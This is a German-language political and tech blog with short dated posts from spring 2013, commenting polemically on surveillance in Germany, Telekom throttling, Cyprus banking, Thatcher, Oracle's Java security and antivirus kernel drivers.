Apples Vergehen war nicht, dass sie wenig Steuern gezahlt haben, sondern dass sie zu wenig Schmiergeld gezahlt haben. Das gleiche Spiel haben die werten Herren Senatoren auch schon mal mit Microsoft gemacht. Da gab es auch längliche "kartellrechtliche Untersuchungen", damit Microsoft einsieht, dass das ernst gemeint ist. Microsoft hat dann ihre Lobbyausgaben hochgeschraubt, und dann gingen die Kartelluntersuchungen unverrichteter Dinge wieder weg.
Auch Walmart und die Finanzbranche wurde so oder so ähnlich zum Schutzgeldzahlen animiert. Nur Apple bleibt beharrlich dabei, nur eine Million für Lobbying auszugeben im Jahre 2010.

Tue May 21 2013

[l] Euch sind bestimmt auch schon die ganzen Überwachungskameras auf den Autobahnen aufgefallen, an den Brücken und so. Vielleicht habt ihr euch gefragt, was die da tun, und euch dann eine Geschichte überlegt, dass die nur zur Stauvermeidung sind, für Statistik im Verkehr, und nicht alle Nummernschilder scannen und archivieren. Denn das verstöße ja gegen die Ansagen des Verfassungsgerichtes. Und überhaupt, so technisch fit sind die bestimmt nicht. Und warum würde man das alles speichern wollen. Das muss ja auch jemand bezahlen. Und Auswertungssysteme kosten ja auch geld. Wie man sich so die Realität immer schönredet.
Heute war im Kölner Express dieser Kasten am Rande. Hat mir jemand gemailt, die URL, kann ich gerade nicht prüfen. Da steht, dass die Polizei bei der Verkehrsüberwachung Anfragen stellen kann, ob Nummernschild soundso am 23. Mai um 17:42 zwischen Köln und Bonn im Stau stand. Und die können das dann nicht nur beantworten, sondern tun das auch im Regelfall vier Mal pro Tag.
Nur falls jemand Illusionen hatte, weil in Deutschland doch immer von Datenschutz und so die Rede ist. Und weil das Verfassungsgericht das explizit untersagt hat. Aber auf Recht und Gesetz scheißen und ethische Bedenken ignorieren ist ja in NRW nicht erst seit Büssow Tradition.

Thu May 16 2013

[l] Nach dem jahrelangen FDP-Bashing hier ist es an der Zeit, denen auch mal zu danken. Für all die großartige Arbeit, die diese Partei über die Jahre geleistet hat. In diesem Sinne: Gut gemacht, FDP!

Thu May 9 2013

[l] Die Krebsforschung scheint echt in einem entsetzlichen Zustand zu sein. Hier hat jemand eine Studie gemacht, und konnte von 53 Papers nur 11% reproduzieren. Schlimmer noch: damit die Studie überhaupt stattfinden konnte, mussten die Forscher unterschreiben, dass sie danach nicht sagen, welche Papers nicht reproduzierbar waren. Sonst hätten sie die Versuchsmaterialien und Daten gar nicht gekriegt. Das klingt für mich eher nach Alchemie als nach Wissenschaft. Grotesk!

Sun May 5 2013

[l] NASA feuert einen Chinesen, weil sie dachten, der sei ein Sicherheitsrisiko. Auslöser war Druck durch einen Republikaner-Abgeordneten. Der hat offenbar noch mehr Druck gemacht und am Ende hat das FBI den am Flughafen verhaftet und seinen Laptop auf geklauten Quellcode untersucht. Aber der hatte auf seinem Laptop nur Pornos und raubkopierte Hollywood-Streifen :-)
Und weil sie dem noch nicht übel genug mitgespielt haben, schreiben sie an die Story auch noch seinen Namen ran.

Fri May 3 2013

[l] Stellt euch vor, George W Bush hätte Paris Hilton zur Handelsministerin gemacht, nachdem sie eine seiner wichtigsten Wahlkampfspender war. Zu weit hergeholt? Na dann guckt mal: Obama macht Hyatt-Milliarden-Erbin zur Handelsministerin, nachdem sie eine seiner wichtigsten Wahlkampfspender war.

Wed May 1 2013

[l] Only in America: Zivilpolizisten dringen in Schule ein, ballern mit Platzpatronen um sich. Die wollten mal gucken, ob die Lehrer gut auf sowas vorbereitet sind. Was die wohl gemacht hätten, wenn da ein paar NRA-Mitglieder im Kollegium gewesen wären, und mit echten Patronen zurückgeballert hätten?

Sun Apr 28 2013

[l] Und wo wir gerade bei großen Skandalen sind: Wie die Großbanken den Fiskus beschubsen. Es geht um Aktien-Leerverkäufe, bei denen das Finanzamt mehrere Erstattungsbescheide für die Kapitalertragssteuer ausstellt. Die Banken haben sich das zu Nutze gemacht, um sich die Steuer teilweise mehr als fünfmal erstatten lassen.
Es soll sogar schon eine Bank deshalb vor Gericht stehen, und zwar die Hypovereinsbank.
Besonders rührend an der Geschichte finde ich ja die Komplizenschaft der ganzen Finanzminister. Eingeführt hat dieses Schlupfloch Rot-Grün 2002, und der Bankenverband hat das Finanzamt nach ein paar Monaten darüber informiert. Das Finanzministerium hat dann — nichts getan. Als Eichel weg war, hat auch Peer Steinbrück — nichts getan. Und Schäuble war auch seit 3 Jahren im Amt, als er Loch das endlich zumachte.
Das traurige dabei ist, wie einen das jeder Illusion beraubt, das Leistungsschutzrecht sei eine Ausnahme. Oder die Hoteliersgeschichte der FDP. Das ist nicht so, dass die Herren Politiker halt von Computern und Internet keine Ahnung haben und sich daher beschubsen ließen. Oder von Hotels. Die Steuergesetzgebung ist ja nun absolutes Kernthema, da kann sich niemand rausreden. Die sind einfach auf allen Gebieten vollständig inkompetent. Es gibt nichts, was die auch nur ansatzweise können.
Oder, was ich ja fast noch die schönere Möglichkeit finde, es handelt sich um Absicht. SPD und CDU kollaborieren darin, den Banken Steuerschlupflöcher zu beschaffen, und tun jetzt entrüstet.

Thu Apr 25 2013

[l] Hier kommt gerade die Frage rein, wieso die Telekom überhaupt drosselt, wenn das doch ihre Erträge senkt, weil sie auf der anderen Seite weniger Peering-Kram verkaufen können.
Das ist eine gute Frage. In der Tat ergibt das nicht viel Sinn. Meine Vermutung ist, dass sie a) Netzausbau sparen wollen und b) dass das schlicht der Versuch ist, Itunes, Lovefilm und co das Geschäftsmodell kaputt zu machen. Das haben sie ja auch in ihrem Mobilnetz erfolgreich kaputtgemacht alles. Da kostet der Traffic viel zu viel, um sich da mal eben einen Film oder eine TV-Folge runterzuladen. Bisher weichen die Leute dann halt auf WLAN aus und ziehen sich das zuhause über ihre DSL-Flatrate. Die Telekom kann halt sehen, wie Apple Milliardengewinne verkündet, während sie da aus ihrer Sicht nur ein paar Brotkrumen bleiben. Natürlich ist das nicht so, die Telekom macht ja selber zweistellige Milliardengewinne. Aber wie das so ist bei den Inkompetenten. Erst kommt der Neid und dann kommt die Einsicht, dass man mit denen nicht konkurrieren kann, also vandalisiert man halt deren Vorgarten. Wenn ich schon nicht Milliarden mit Content scheffeln kann, dann soll es auch sonst keiner können. Die eigenen Kunden werden dafür als Geiseln und menschliche Schutzschilde genommen, denn die sieht die Telekom ja eh schon immer als etwas negatives, nicht als etwas positives, erhaltenswertes. Wer schonmal mit dem Telekom-Support telefoniert hat, weiß, was ich meine.
Aus meiner Sicht ergibt das wie gesagt auch aus marktwirtschaftlicher Perspektive keinen Sinn, was die Telekom da gerade tut. Daher glaube ich wirklich, dass man da auf der Aktionärsvollversammlung ein Fass aufmachen könnte und sollte.
Ich würde wirklich gerne mal die Zahlen sehen, wieviel Kohle die Telekom mit ihrem DSL scheffelt und wieviel Kohle sie mit den Zugängen für Content-Provider scheffelt. Vielleicht machen die ja einfach (nach Abzug der Kosten für Callcenter, Reparaturen, Acquise, T-Punkte und so weiter) tatsächlich mehr Geld mit dem Hosting und dem Verkaufen von Bandbreite an andere Internet-Teilnehmer als an ihre Kunden.

Tue Apr 23 2013

[l] Kurze Durchsage vom Militärischen Abschirmdienst: "Wir haben keine Fehler gemacht".
Es gibt ja nur einen Weg, sicher zu sein, dass man keine Fehler gemacht hat. Wenn man gar nichts gemacht hat. Und dann können wir sie ja auch zumachen.

Thu Apr 18 2013

[l] Mushroom Cloud nach einer Explosion in einer texanischen Düngerfabrik (mit Foto). Wow, das muss ordentlich Wumms gemacht haben. Angeblich behauptet da jemand, dass sein Truck (und wir reden hier von Texas, das Gefährt hatte also vermutlich das Format eines Schulbusses) einen Block von der Fabrik von der Straße geschoben wurde von der Druckwelle.
Update: Und als weiterer Sargnagel für die Selbstregulierung der Industrie kommt raus, dass die Düngerfabrik beim Formular der Umweltschutzbehörde das Kreuzchen beim AKW-Feld gemacht hat. Ihr wisst schon welches. "Es besteht keinerlei Gefahr für Mitarbeiter oder Anwohner" :-)
Update: Hier hat das einer gefilmt. GANZ schlaue Idee! Hey, da brennt ein Haufen Sprengstoff! Lass uns da hinfahren und das filmen!1!! Was kann da schon passieren!1!!

Wed Apr 17 2013

[l] Lacher des Tages: Wie Oracle versucht, das Java-Problem schönzureden. Also eeeeerstens haben wir das ja ab jetzt voll im Griff alles. Wir haben sogar einige der Schwachstellen selber gefunden! Leider nicht gefixt, bevor uns jemand bei pwn2own damit nassgemacht hat, aber hey, man kann ja nicht alles haben!1!!
Und im Übrigen führen wir jetzt Code Signing ein. Ihr wisst schon, das was schon bei Microsoft nicht funktioniert hat. Das machen wir jetzt, nachdem die Kryptokalypse jedes Restvertrauen in CAs weggefegt hat. Post Diginotar. Money Quote:
Rizvi noted that the signing requirement will improve the security of Java users in a number of ways. For one, it will create some sense of accountability with Java code developers.
Öh, … sense of accountability? BWAHAHAHAHA! Wartet, wird noch besser!
"Malicious attackers will be required to purchase a code-signing certificate," he said. "Note that before issuing a code-signing certificate, certificate authorities generally perform certain checks to ensure the identity of the person applying for the certificates."
Oho, aha, soso. Im Allgemeinen würde man denken, dass CAs Dinge prüfen, sagt er. Na dann ist ja alles gut. Immerhin ist Oracle da mehr als zurückhaltend und lässt nicht einfach jeden signen. Nur die CAs, die bei Java als vertrauenswürdig mitgeliefert sind. (Also in der Praxis… alle)
Und haben sie auch Revocation Checking? Klar! *hust* Wenn der User es manuell angeschaltet hat!1!! Aber das wird dann im Juni Default. Warum erst im Juni? Äh, guck mal da hinten, ein dreiköpfiger Affe!
Aber das Hammer-Zitat überhaupt ist das hier:
"At Oracle, 'every developer is a security rifleman' and additional security expertise is also found with security-focused developers, architects and managers for the purpose of enforcing security policies and dealing with security-sensitive components," Rizvi said.
Soso, "security riflemen". Na dann. m( (Danke, Aaron)
[l] Yo dawg, wir haben gehört, dass du Web-Browser magst, also haben wir einen Bild-in-Bild Mobil-Browser als Chrome-Plugin gebaut. Damit kannst du browsen, während du web klickst!1!!
Was für eine grandiose Idee. Full Circle.
Der Lacher ist ja, dass die Leute alle lieber mit ihren Mobilgeräten webklicken gerade, weil man da nicht dauernd mit Werbung penetriert wird. Auf den Desktop-Sites wird man ja nur noch mit Interstitionals und Javascript-Popups mit Newsletter-Abo- und Facebook-Like und Paywall-Spenden-Aufforderungen bombardiert. Klar hat da keiner Bock drauf, daher klicken die alle mobil. Und dann wundern sich die Sites, dass immer mehr Leute mobil klicken!1!!
Und jetzt klicken die Leute halt auch auf ihrem Desktop "mobil". Und die ganzen ranzigen Webseiten werden reagieren, indem sie auch die Mobilversionen unbenutzbar machen. Und dann werden sie sich alle wundern, wieso jetzt gar keiner mehr bei ihnen klickt.
Und lustigerweise sind die alle selber Schuld. Früher gab es ein Banner oben. Das war es. Ein Banner. Das hat die ganze Site finanziert. Aber die mussten ja alle gierig werden und noch ein Skyscraper-Banner an die Seite machen, und noch eines in die Mitte, und ihre Artikel auf 15 Seiten aufteilen, damit überall noch mehr Werbung hingetan werden kann, und dann noch an die andere Seite eine Werbung, dann noch unten eine Werbung drunter, dann noch ein Interstitional davor — natürlich zahlt dann kein Werbetreibender mehr den vollen Preis pro Banner. Das ist ja völlig lächerlich. Die haben sich selbst den Werbemarkt kaputtgemacht mit ihrer Gier. Und ihre Leser vergrault oder in die Arme von Adblockern getrieben. Aber das ist ja ein Kampf, bei dem es auf Dauer nur Verlierer gibt. Ich glaube ja, wenn die die Anzahl der Werbebanner auf 1-2 reduzieren, die ganze überflüssige Navigationsscheiße wegmachen, und den Social Networking Bullshit rausnehmen würden, dann würden die Leute wieder gerne auch auf dem Desktop klicken, und sie würden pro Werbebanner auch wieder richtige Preise nehmen können.

Tue Apr 16 2013

[l] Markus Kompa hat zu den Luxemburger Stay-Behind-Geschichten ein Interview mit Daniele Ganser gemacht. Das ist ein Coup, denn Ganser ist die Autorität auf dem Gebiet. Wenn ihr von dem noch nie was gehört habt, nehmt euch mal Zeit und googelt den. Es gibt glaube ich auch auf Youtube eine Vorlesung vondem zu sehen. Mit dem würde ich auch gerne mal ein Alternativlos aufnehmen :-) Eine Einladung haben wir ihm schon ausgesprochen, mal gucken ob er mal Zeit und Lust findet.

Fri Apr 12 2013

[l] Flexstrom meldet Insolvenz an. Nicht weil sie Verlust gemacht hätten. Nein.
Bei Flexstrom und den Tochtergesellschaften OptimalGrün und Löwenzahn Energie seien Kunden mit hundert Millionen Euro im Rückstand
Die Firma gibt die Schuld der schädigenden Berichterstattung. Was sie damit wohl meinen? Vielleicht sowas hier?
[l] Habt ihr euch schon Sorgen gemacht, dass Deutschland lange keine Panzer mehr verkauft hat? Sorgt euch nicht: Brasilien kauft für die Fußball-WM ein paar deutsche Flakpanzer. Denn was braucht man dringender zu einer Fußball-WM als Panzer!

Tue Apr 9 2013

[l] Nachdem wir die "parteinahen Stiftungen" hatten: Habt ihr euch mal gefragt, woher die Jugendorganisationen der Parteien ihre Kohle haben? Gar nicht mehr, wie sich rausstellt, denn "Kohl-Groupie" Kristina ~~Köhler~~ Schröder hat denen ihre Finanzierung aus Steuermitteln kaputtgemacht. Sie wollte verhindern, dass die Linksjugend vom Bund Geld kriegt, und hat dann vor Gericht Recht bekommen — aber damit auch gleichzeitig den anderen Jugendorganisationen der Parteien den Geldhahn abgedreht.
Ich bin ja nicht oft zufrieden mit der Arbeit von Frau Schröder, aber in diesem Fall muss ich doch sagen: Gut gemacht. Diese Junge Union und Jungliberalen mit ihren Neocon-Marktradikalisierungs-Terrorcamps hätten wir schon viel früher austrocknen müssen. Die sind zwar häufig weniger übel als die alten, aber bis die dann alt sind, bleiben nur noch die Fundamentalisten übrig. So Leute wie Wulff und Schröder. Good riddance. (Danke, Christian)
[l] Erinnert ihr euch an die Trojaner-Debatte, als es hieß, die Software könne leider nicht punktuell löschen? Erinnert ihr euch auch, dass das Zollkriminalamt Köln unter den Kunden von Digitask war? Nun, mir mailte heute jemand eine Gerichtsentscheidung des OLG Köln zu, Aktenzeichen 16 Wx 16/12. Es ging darin um eine Schnüffelmaßnahme des Zollkriminalamtes. Die hatten als Saugrüssel-Beifang auch eine unverschlüsselte VoIP-Verbindung mit dem Anwalt mitgeschnitten. Die sind privilegiert und hätten nicht aufgezeichnet werden dürfen, zumindest aber hätten sie sofort gelöscht werden müssen. Das hat das ZKA nicht gemacht, und das so begründet, dass ihre Software von Digitask das nicht könne. Es gäbe zwar eine neuere Version, die es gekonnt hätte, aber die konnten sie nicht einsetzen, weil ihre Server eine zu alte Windows-Version fuhren, die die neue Digitask-Software nicht mehr unterstützt.
Dem konnte sich das OLG nicht anschließen und urteilte, dass wenn sie das nicht trennen können, aus welchen Gründen auch immer, dann dürfen sie halt gar nichts aufzeichnen. Zu viel Speichern wegen Inkompetenz geht jedenfalls nicht. Grundrechtsschutz hängt nicht von der Haushaltslage der überwachenden Behörde ab.
Money Quote:
Die technische Ausstattung muss den (verfassungs)rechtlichen Vorgaben entsprechen. Verwaltungsinterne Probleme bei der Beschaffung der erforderlichen Hard- und Software rechtfertigen keinen Grundrechtseingriff.
*Strike*! Das ist dann wohl auch für die ganzen anderen halbgaren Abhörinfrastrukturen den Gnadenschuss. Sehr schön! (Danke, Ulf)
[l] Nach all dem Thatcher-Bashing sei auch darauf hingewiesen, dass der Cameron gerade genau das gleiche fährt. Aktuelle Begriffe im politischen Diskurs hier sind "Bedroom Tax" und die NHS-Reform. Die Bedroom Tax ist die Idee, dass man Sozialhilfeempfängern verbieten muss, in zu großen Häusern zu wohnen. Wenn jemand mehr Schlafzimmer hat als er braucht, dann muss er Abzüge auf die Sozialhilfe hinnehmen. Das muss man vor dem Hintergrund verstehen, dass Baumaßnahmen in Großbritannien seit Jahren wenig bis gar nicht von den jeweiligen Kommunen genehmigt werden. Der Fachbegriff dafür in der Presse heißt "Nimby", Not In My Back Yard. Sozialer Wohnungsbau ist ja schön und gut, aber nicht hier. Solarzellen? Super, aber nicht hier. Windkraft? Spitze, aber bitte woanders. Und so kommt es, dass z.B. in London Sozialhilfeempfänger eben in den Wohnungen wohnen, die da waren, nicht in speziell gebautem sozialen Wohnungsbau, und die sollen mit diesem Ansatz weggeekelt werden.
Die NHS-Reform ist auch ganz toll. NHS ist das öffentliche Gesundheitssystem in England, National Health Service. Die andere Hälfte dieser Reform habe ich hier schon erklärt, die Dezentralisierung in der Hoffnung, dass den neuen dezentralen Entscheidungsbefugten ihre ureigenen Instinkte wichtiger sind als das Gemeinwohl. Bei der NHS ist der Ansatz, dass man den Ärzten das Kommando übergibt. Und da es mehr niedergelassene Ärzte als Ärzte in Krankenhäusern gibt, und die niedergelassenen Ärzte alle gerne mehr Geld verdienen würden, hetzen die jetzt gegen die Krankenhäuser, weil da so viele alte Menschen in den Betten liegen, und um die könnten ja auch wir niedergelassenen Ärzte uns kümmern. Und so ist abzusehen, dass demnächst noch mehr Krankenhäuser ausbluten. Das läuft schon seit Jahren, dass ständig Krankenhäuser aus Kostengründen zugemacht werden, weil die Budgets dafür eben aus den Kommunen kommen, nicht aus dem Topf der Zentralregierung. Und die Kommunen hier sind genau wie die in Deutschland bis zum Anschlag pleite und haben schon ihr Tafelsilber verkauft. Die haben eh schon alles zugemacht, was nicht akut lebensbedrohlich ist. Neulich hörte ich im Radio einen Beitrag, in dem ein Lokalpolitiker die Schließung eines Krankenhauses kritisierte, weil man ja jetzt schon (!) anderthalb Stunden unterwegs sei, bis man beim Krankenhaus sei, und wenn die das auch noch zumachen, dann sind es eher zweieinhalb Stunden, und bis dahin ist man dann halt tot. Auf dem Niveau operiert das System hier schon. Und natürlich ist London nicht betroffen, weil da die ganze Kohle verdient wird, die können sich Krankenhäuser leisten. Aber die Dezentralisierung funktioniert eben als Strategie für Cameron, um die Kommunen weiter auszubluten. Und am Ende verteidigen die dann die Banker, weil sie glauben, dass sie sonst ganz sterben müssen, wenn sie die wegekeln und gar keine Almosen aus London mehr kriegen.
Update: Hier gibt es eine ganz gute Zusammenfassung der Lage.
[l] Bei den Nachrufen auf Thatcher sind in der Tat ein paar Perlen dabei. Die krasseste Reaktion kommt vom Kommunistenblatt Socialist Worker, die "Rejoice!"-Plakate verteilt haben. Es gab wohl auch Parties in einigen Gegenden. Übrigens, wenn ihr diese Milch-Referenzen nicht versteht: Das ist Teil ihres Erbes, sie hat u.a. das Schul-Budget für kostenlose Milch für Schüler über 7 Jahren weggekürzt.
Der Guardian hat u.a. Gorbatschow erzählen lassen, und der hat da eine nette Anekdote erzählt, wie er das erste Mal als Teil einer Delegation der Sowjetunion in England war, vergleichsweise warm empfangen wurde und dann aber starken Gegenwind kriegte, als sie bei Thatcher drinnen waren. Das wurde so schlimm, dass beide Seiten mehrfach dachten, die Gespräche müssten gleich abgebrochen werden. Gorbatschow wies dann ganz trocken auf den Umstand hin, dass er nicht vom Politbüro mandantiert sei, Thatcher für die Kommunistische Weltrevolution zu gewinnen, und das führte zu einem Lachkrampf bei Thatcher und brach das Eis.
Sie kriegt zwar kein Staatsbegräbnis mit vollen militärischen Ehren, aber doch eine Zeremonie der Größenordnung, wie sie auch Queen Mum und Princess Diana gekriegt haben.
Ich für meinen Teil möchte die Meldung zum Falkland-Krieg erinnern, wo kürzlich Korrespondenz vor dem Ausbruch des Krieges veröffentlicht wurde. Die hat beleuchtet, wieso es überhaupt einen Krieg gab. Ich zitiere mal:
"I sent PM a memo saying we should get Argentina to pay compensation to the Falklanders – objections from John Coles [her foreign affairs adviser] that PM would through [sic] it out – need some blood first for credibility to H/C [House of Commons] and to Argentine – I doubt it. This Jingo mood will pass but JH [Hoskyns] thinks she will miss the change."
Das war Thatcher, wie sie leibt und lebt. Wir brauchen erst ein bisschen Blut für die Glaubwürdigkeit.
Andere Highlights ihrer Karriere: Sie bezeichnete Nelson Mandela als Terroristen und stützte das Apartheit-Regime in Südafrika. Sie hat Pol Pot geholfen. Ihr Privatisierungswahn hat inzwischen ganz Europa infiziert und letztlich zum Benennen des Fnord-Jahresrückblicks-Infrastrukturvernichts-Awards nach ihr geführt. Sie war auch Pinochet-Unterstützerin und hat ihm gar eines Tages dafür gedankt, "Demokratie nach Chile gebracht zu haben". Sie hat auch den Militäreinsatz im Inland im Nachkriegseuropa hoffähig gemacht, indem sie das Militär als Streikbrecher und in Polizeiunform als "Sicherheitspersonal" eingesetzt hat. So hat sie letztendlich den Einfluss der Gewerkschaften in England zerstört. Sie musste damals wegen der "Poll Tax" zurücktreten. Das war die Idee, dass man Steuern auf Häuser pro Kopf im Haushalt zahlt, nicht pro Größe oder Wert des Hauses. D.h. eine arme Großfamilie zahlt mehr als ein Milliardär in einem Palast. Das hat ihr dann politisch das Genick gebrochen.
Update: Oh und an der Bankenderegulierung ist sie auch Schuld.
Update: Glenn Greenwald ist auch kein Freund falscher Zurückhaltung.

Fri Apr 5 2013

[l] Uiuiui, jetzt hat es auch Microsoft erwischt: Windows Defender ermöglicht Einbruch in Windows-Systeme. Windows Defender hatte bisher einen recht guten Ruf, wenn es um diese Art von Problem ging. Dafür waren wohl die Erkennungsraten eher mau, aber hey, das ist ja eh alles Schlangenöl, und die anderen kriegen die höheren Raten auch nur mit Beschiss wie MD5-basiertem Cloud-Lookup.
Die meisten wissen das nicht, aber habt ihr euch mal gefragt, wie Antiviren eigentlich Kernel-Malware desinfizieren? Die haben einen Kernel-Treiber, klar, aber den will man ja nicht jedesmal updaten müssen, wenn man eine neue Desinfektions-Methode einbaut. Daher haben die ganzen Schlangenöl-Lieferanten im Allgemeinen in ihrem Kernel-Treiber einen ioctl, der sie im Kernel-Space frei lesen und schreiben lässt. Die eigentliche Desinfektion findet dann per Peek und Poke aus dem Userspace statt. Dadurch werden dann natürlich elementare Grundsätze wie Code Signing für Treiber unterlaufen, und insgesamt die Sicherheit kaputtgemacht. Aber so funktionieren Antiviren. Fast alle. Soweit ich weiß alle, bis auf Windows Defender. Der hat sowas nicht.
Wenn man dieses Detail kennt, und sich dann überlegt, dass Firmen ihre Systeme zertifizieren lassen, wegen der Sicherheit, und dann die Sicherheitsversprechen wieder kaputtmachen, indem sie Schlangenöl mit Kernel-Poke-Funktionalität drüberinstallieren, dann sieht man, was für ein Wahnsinn das ist, was die Leute sich da alle installieren.
Tja, und jetzt ist auch der letzte Schlangenöllieferant umgefallen, Microsoft.
Vielleicht glaubt ihr mir jetzt endlich, wenn ich sage, dass Antiviren Systeme unsicherer machen statt sicherer.
Aber hey, der Zeitgeist geht hin zum Antivirus für Android.

Wed Apr 3 2013

[l] Seit Jahren wird uns jetzt geraten, unsere Daten nicht in US-Cloud-Services zu lagern, sondern in den guten deutschen Cloud-Services. Weil bei den Amis, müsst ihr wissen, da greifen die Behörden völlig ohne Zurückhaltung einfach so in eure Daten und schnorcheln alles ab. Passwörter helfen nicht. Verschlüsselungsversprechen der Provider auch nicht. Alles furchtbar da drüben, macht das lieber bei uns.
So langsam spricht sich herum, dass das bei uns genau so ist. Stichwort dazu ist übrigens auch "Bestandsdatenabfrage". Mein Alternativlos-Partner Frank hat übrigens kürzlich beim Logbuch Netzpolitik mitgemacht und u.a. darüber geredet. Zustände, wie man sie sonst nur in Russland und China erwarten würde.
[l] In eigener Sache: Hab lieber Osterferien gemacht als mir einen neuen Aprilscherz auszudenken. Stellt sich raus, dass der Code von vor zwei Jahren noch drin war. Hat überraschenderweise doch noch den einen oder anderen Neuleser überrascht, insofern: April, April! :-)
In Sachen Osterferien kann ich mal eine Anekdote erzählen. Ich bin u.a. mit der Bahn nach Cardiff gefahren, weil ich mir dachte, Hauptstadt von Wales, Hafenstadt, ist bestimmt nett da. War es auch, Cardiff hat mir sehr gut gefallen. Die Anekdote ist aber nicht über Cardiff sondern über die Bahn. Die Bahngesellschaft heißt First Great Western, das fand ich ja an sich schon mal großartig, weil es eher nach Kalifornien als nach England klingt. Erster Eindruck war, dass am Fenster der Türen ein Aufkleber war: Bitte Fenster zumachen, das spart Energie. Nanu? Man kann die Fenster aufmachen? Komisch, diese Briten. Dachte mir da erstmal nichts bei.
Als ich den Zug verlassen wollte, war ich dann der erste an der Tür und stellte fest, dass es da keinen Knopf oder Hebel zum Öffnen gibt. Nanu? Einfach ziehen? Nein! Man muss das Fenster ganz runterziehen, dann mit dem Arm nach außen durchgreifen, und dann den Hebel außen (!) durch das Fenster betätigen, um die Tür zu entriegeln. Dann kann man sie aufstoßen. Kinder und Menschen mit kurzen Armen haben verloren.
Deshalb kann man in England im Zug das Fenster an der Tür öffnen!

Wed Mar 27 2013

[l] Zypern ist jetzt schon bei 40%. Werte Leser, was wir hier gerade erleben, ist die sagenumwobene Schäuble-Inversion. Sie ist bisher noch nie in der Öffentlichkeit beobachtet worden. Sonst fängt Schäuble mit bizarren Mondwerten ganz weit oben an und lässt sich dann großzügig auf kleinere aber immer noch unverschämte Mondzahlen "herunterhandeln". Dieses Mal fängt er klein an und geht dann solange hoch, bis ihm das ganze um die Ohren fliegt, und dann geht er einen Schritt zurück. Erinnert ein bisschen an holländische vs normale Auktionen.
In jedem Fall wird hier gerade Geschichte geschrieben. So wird ab jetzt Politik gemacht werden. Die werden so lange unverschämter, bis es Revolution gibt.

Fri Mar 22 2013

[l] Wie kommt das eigentlich, dass die Netzpolitik gerade auf allen Fronten verloren geht?
Ich glaube ja, dass die Piraten Schuld sind.
Als die angetreten sind, haben die Firmen alle volle Hosen gehabt, weil sie dachten, sie kommen mit ihrem borderline kriminellen Verhalten nicht länger durch. Die Piraten rollten mit Rückenwind bergab, und der Gegner wurde von der Sonne geblendet, und was haben sie daraus gemacht? Einen dermaßen epochalen Totalschaden, dass das in die Geschichtsbücher eingehen wird. Nichts erreicht, alles was sie angefasst haben mit Nachdruck in einer Niederlage verwandelt, aus Torchancen per Fallrückzieher ein Eigentor gemacht. Netzpolitik ist jetzt wieder unwichtig. Die Piraten haben dem Establishment gezeigt, dass von den Netzbürgern außer belanglosem Rumtwittern nichts zu erwarten ist. Schlimmer noch: Das Engagement und die realen Aktionen sind eher kleiner geworden, seit es die Piraten gibt. Denn die Leute haben jetzt den Eindruck, es gibt da ja jetzt eine Partei für, dann muss ich ja nicht mehr meinen Hintern hochkriegen.
Überhaupt ist das der neue Stand jetzt. Die Leute klicken auf irgendwelchen belanglosen Webseiten irgendwelche Petitionen und halten damit ihren Part für erledigt.
Und dann wundern sich alle, dass die Telekom ihr Internet drosselt.

Wed Mar 20 2013

[l] Wichtige Fundsache: Hier erklärt mal jemand die Lage in Zypern. Kurzzusammenfassung: Zypern ist vergleichsweise wenig verschuldet und hat frisch eine Austerity-Regierung gewählt. Der Bailout der Banken ist nötig, weil Zypern bei der Griechenlandrettung mitgemacht hat, wo man ihnen zu verstehen gab, dass ihnen dann auch geholfen würde, wenn es soweit ist. Das war offensichtlich eine Lüge. Dass das jetzt so platzt ist der Versuch, den neuen Präsidenten umzurempeln, solange er noch frisch und unsicher im Amt ist.
Man kann also sagen, dass die Zyprioten Recht haben, wenn sie der Merkel die Schuld geben. Wieso ist die eigentlich noch im Amt? Wie viele Länder muss die noch plätten, bevor sie endlich rausfliegt?

Tue Mar 19 2013

[l] Für die Zyprioten ist übrigens völlig klar, wer an dem Debakel gerade Schuld ist. Sieht man in der deutschen Presse nicht so klar wie in der Britischen. Die Deutschen sind Schuld. Details beim Guardian. Highlight sind diese Tweets :-)
Zypern hat übrigens nicht nur Überweisungen ausgesetzt sondern die Banken gleich ganz zugemacht. Und die EU-Länder spielen jetzt alle Reise nach Jerusalem:
Britain temporarily withheld pension payments to more than 12,000 citizens who have retired to Cyprus amid concerns about the safety of the banking system. Up to 60,000 British people are thought to be affected by the seizures.
Ja super, wenn jetzt alle ihre Überweisungen ins System zurückhalten, bis die Lage geklärt ist, müssen die Rentner jetzt hungern oder was? Und das Land blutet aus?
[l] In England gibt es auch gerade mal wieder Popcornkino vom Feinsten. Die hatten doch vor ner Weile diesen Phone Hacking-Skandal. Die Murdoch-Presse hat die Anrufbeantworter von Promis gehackt, um an deren private Details zu kommen. Es gibt in England einen Pressecode und eine Regulierungsbehörde, aber die hat massiv versagt in dieser Angelegenheit und viel zu lange gar nichts gemacht. Am Ende mussten sich die Opfer vor Gericht selber ihr Recht erstreiten und Murdoch musste die Geldbörse aufmachen.
Das haben diverse Lobbygruppen jetzt zum Anlass genommen, eine "bessere Presseregulierung" zu fordern. Das kam zustande, wie sowas immer zustande kommt: als blinder Aktionismus. Und dann passierte das Unglaubliche. In der Nacht, nach Mitternacht, haben plötzlich die Tories, Labour und die LibDems eine Einigung erzielt, die u.a. den Zeitungen das Vetorecht für Leute im Regulierungsgremium aberkennt. Die hatten sich da bis zuletzt gegen gesträubt, um zu verhindern, dass es noch schlimmer wird für Presse in England.
Die Briten haben im Moment schon die übelsten Libel und Slander-Gesetze (üble Nachrede und Beleidigung). Die sind so übel, dass sich ein Libel-Tourismus etabliert hat, bei dem dann schon mal Saudi-Prinzen in England eine US-Zeitung verklagen, weil deren Internetausgabe ja auch in England einsehbar ist. Vergleichbar mit unserem Landgericht Hamburg in Internetfragen.
Nun, jedenfalls, die Zeitungen haben das nicht kommen sehen, dass sich die drei Parteien einigen, und dann auch noch so plötzlich und ohne Vorwarnung, und der Guardian schrieb heute morgen, die Presse sei Shell Shocked (alter Ausdruck für Post-traumatische Belastungsstörung). Es ging da in den Verhandlungen um so Fragen wie dass Labour das als Statut haben wollte, das man nur mit einer 2/3-Mehrheit wieder kippen kann, und Tory wollte nur ein normales Gesetz haben. Jetzt haben ein normales Gesetz gemacht, in dem drinsteht, dass man ne 2/3-Mehrheit braucht. Das ist allerdings legal völlig bedeutungslos, wenn man das da reinschreibt, weil ein Parlament zukünftigen Parlamenten keine Vorhaltungen machen darf.
Die Punchline der ganzen Geschichte ist aber das hier: Daily Mail, Telegraph und die Murdoch-Presse wollen nicht mitmachen. Der einzige Grund für diese ganze Chose war ja gerade die Murdoch-Presse.

Sun Mar 17 2013

